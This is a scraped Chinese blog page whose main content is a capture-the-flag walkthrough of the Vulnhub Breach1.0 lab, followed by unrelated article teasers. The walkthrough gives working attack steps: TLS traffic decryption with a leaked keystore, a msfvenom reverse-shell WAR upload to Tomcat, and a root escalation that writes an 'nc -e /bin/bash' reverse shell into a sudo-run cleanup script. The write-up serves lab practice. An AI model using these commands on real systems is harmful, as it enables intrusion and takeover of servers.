news 2026/3/14 8:49:06

Vulnhub实战靶场Breach1.0

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Vulnhub实战靶场Breach1.0

这次做一个Vulhub 实战靶场 Breach1.0

参考学习: https://www.cnblogs.com/sym945/p/13604758.html

前言

Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。

VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。

环境配置

启动虚拟机,因为靶场虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only仅主机的方式,我将kali攻击机,添加了一块虚拟网卡,第二块网卡设置的网段跟虚拟机同一网段。

开始实验

下载好靶机,并且启动

知道了靶场环境的ip地址,所以可以直接使用nmap扫描端口,查询突破口,但是扫描之后发现端口全是打开的,显然是做了防端口扫描。

根据靶场规律,直接访问ip地址,发现有http服务。

查看网页源代码,发现有一串base64加密的字符串。

Base64解密连续解密两次

echo Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo | base64 -d

echocGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh| base64 -d

解密结果如下:

pgibbons:damnitfeel$goodtobeagang$ta初次推断可能是账号和密码

而且除了字符串,源码里还有个文件地址,打开访问发现另外的页面

访问页面,跳转到如下页面

点击Employee portal,进入到impresscms的登录界面。

想到之前的base64解密结果pgibbons:damnitfeel$goodtobeagang$ta
尝试用这个来登录

可以登录成功,页面如下:

使用命令,searchsploit impresscms,找到impresscms的/modules/profile/admin/field.php文件存在SQL注入漏洞,想要利用,但是发现没有权限访问该文件。

那就回到网页,看到有3个邮件消息,看是否有提示信息

查看前两份邮件,没有任何有用的信息,直到第三份邮件发现了关键信息。

第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore

根据邮件提示,到下载包含SSL证书的密钥库keystore文件,keystore是存储公私密钥的一种文件格式,下载下来保存好。

点击home,进入index.php

再点击content

在新界面里面发现了链接。

点开提示的,http://192.168.110.140/impresscms/modules/content/content.php?content_id=1,发现一个流量包文件,下载下来。

而且还有提示信息:They told me the alias, storepassword and keypassword are all set to 'tomcat'

别名、Keystore密码、key密码都设置成tomcat。由此推测:

1)这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码;

2)系统中可能存在tomcat。

在下载了keystore文件的目录中打开终端,输入命令:keytool -list -keystore Untitled.keystore,输入口令tomcat,查看keystore密钥库中的证书。

接下来,从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,输入命令:keytool -importkeystore -srckeystore Untitled.keystore -destkeystore tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat

将生成的tomcatkeystore.p12证书导入wireshark,点击编辑--首选项--Protocols--TLS,点击Edit编辑,IPaddress填写192.168.110.140,Port填写8443,Protocol填写http,Key File选择生成的tomcatkeystore.p12文件,Password填写tomcat。

分析浏览量数据包,发现一个Unauthorized的认证包,该request和response包含了Tomcat后台的登录地址:https://192.168.110.140:8443/_M@nag3Me/html

把信息提取出来:

tomcat:Tt\5D8F(#!*u=G)4m7zB 可能是账号和密码

https://192.168.110.140:8443/_M@nag3Me/html

直接访问会显示建立安全连接失败

这个时候需要打开burp suite但不开启拦截

打开代理,重新打开网页会出现登录框,把之前tomcat:Tt\5D8F(#!*u=G)4m7zB输入进去。

成功登录到后台。

有上传文件的功能,可以生产一个木马文件,

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=1234-f war -o shell.war

使用msf ,参数设置成自己刚刚设置的

把shell.war上传到网站。

上传成功后,访问https://192.168.110.140:8443/shell/shell.jsp,在msf下顺利拿到shell

查看当前用户;cat /etc/passwd 收集信息,看到两个值得关注的账户。

在/var/www/5446目录下,看到两个文件名很特殊的文件。

查看文件,发现是mysql的数据库连接文件,使用的root账户,不需要密码。

输入命令,mysql -u root -p ,进入mysql,提示输入密码,直接回车,成功连接进入mysql数据库,查看账号密码,得到milton账户的密码哈希,解密为:thelaststraw

通过密码thelaststraw 来登录milton账户。

退出mysql,使用命令,su milton,输入密码,成功登录milton账户

账户milton目录下,发现的some_script.sh脚本,没有可利用的地方

查看历史命令,发现有切换到blumbergh这个账户的操作,操作之后有切换到root的操作,所以可能提权要进入到blumbergh这个账户。

继续收集信息,http://192.168.110.140/images/,目录下找到6张图片,milton用户目录下,发现1张图片。

使用exiftool工具,查看图片,输入命令:exiftool bill.png ,发现密码:coffeestains

切换到blumbergh账户,输入之前图片中得到的密码,切换成功。

进入blumbergh目录下,查看blumbergh账户的历史命令,发现/usr/share/cleanup目录下的,tidyup.sh脚本文件。

一样进入目录,查看脚本,为root账户才能读写的,用来清理删除webapps目录下的文件的脚本。

echo "nc -e /bin/bash 192.168.110.122 2345" > shell.txt,将nc执行的反弹shell命令,写入到shell.txt文件

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh,使用tee命令将shell.txt内容输出到tidyup.sh

打开另一个终端,输入nc -lvvp 2345,监听2345端口的动静,等到一段时间,成功接到root的shell。

查看/root目录下,有个flair.jpg的文件,应该是最后的flag,将文件再次复制到/var/www/html/images中,查看图片,成功得到flag。

这个图片感觉不算是flag,回到一开始的目录下。

ls -a 发现有.flag.txt文件,直接cat一下,拿到flag,这个才是真正的flag。

结束!

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/12 4:16:39

LangFlow垃圾回收机制调优建议

LangFlow垃圾回收机制调优建议 在AI应用开发日益普及的今天,图形化工作流工具如LangFlow正成为连接非专业开发者与大语言模型(LLM)之间的桥梁。它允许用户通过拖拽节点的方式构建复杂的LangChain流程,极大降低了智能体开发门槛。然…

作者头像 李华
网站建设 2026/2/27 20:32:29

YimMenu:GTA5游戏增强工具完全指南 - 从新手到高手的5大核心功能详解

YimMenu作为一款专为《侠盗猎车手5》设计的游戏增强工具,为玩家提供了安全稳定的游戏功能扩展体验。这款基于C开发的工具框架,通过模块化设计让游戏玩法更加丰富多彩。 【免费下载链接】YimMenu YimMenu, a GTA V menu protecting against a wide ranges…

作者头像 李华
网站建设 2026/3/13 12:05:59

19、《Calc应用程序视图类详解》

《Calc应用程序视图类详解》 1. 视图类概述 CCalcView 是 Calc 应用程序的视图类,它主要负责处理鼠标和键盘消息,以及重绘客户端区域。该类包含几个重要的成员变量: - m_pCalcDoc :指向文档类对象的指针,在 OnCreate 方法中进行初始化和测试。 - m_bDoubleClick …

作者头像 李华
网站建设 2026/3/8 16:40:41

TsubakiTranslator游戏翻译工具:告别语言障碍的完整解决方案

TsubakiTranslator游戏翻译工具:告别语言障碍的完整解决方案 【免费下载链接】TsubakiTranslator 一款Galgame文本翻译工具,支持Textractor/剪切板/OCR翻译 项目地址: https://gitcode.com/gh_mirrors/ts/TsubakiTranslator 还在为看不懂日文游戏…

作者头像 李华
网站建设 2026/3/13 5:39:34

忘记压缩包密码怎么办?这款智能工具让你3分钟轻松解锁

"糟糕,压缩包密码忘记了!"这可能是每个电脑用户都曾经历过的尴尬时刻。重要的工作文档、珍贵的照片资料、关键的备份文件,都被一道密码牢牢锁住,让人束手无策。 【免费下载链接】ArchivePasswordTestTool 利用7zip测试压…

作者头像 李华
网站建设 2026/3/4 1:34:42

B站4K视频下载终极方案:从入门到精通的完整实战指南

B站4K视频下载终极方案:从入门到精通的完整实战指南 【免费下载链接】bilibili-downloader B站视频下载,支持下载大会员清晰度4K,持续更新中 项目地址: https://gitcode.com/gh_mirrors/bil/bilibili-downloader 你是否曾经遇到过这样…

作者头像 李华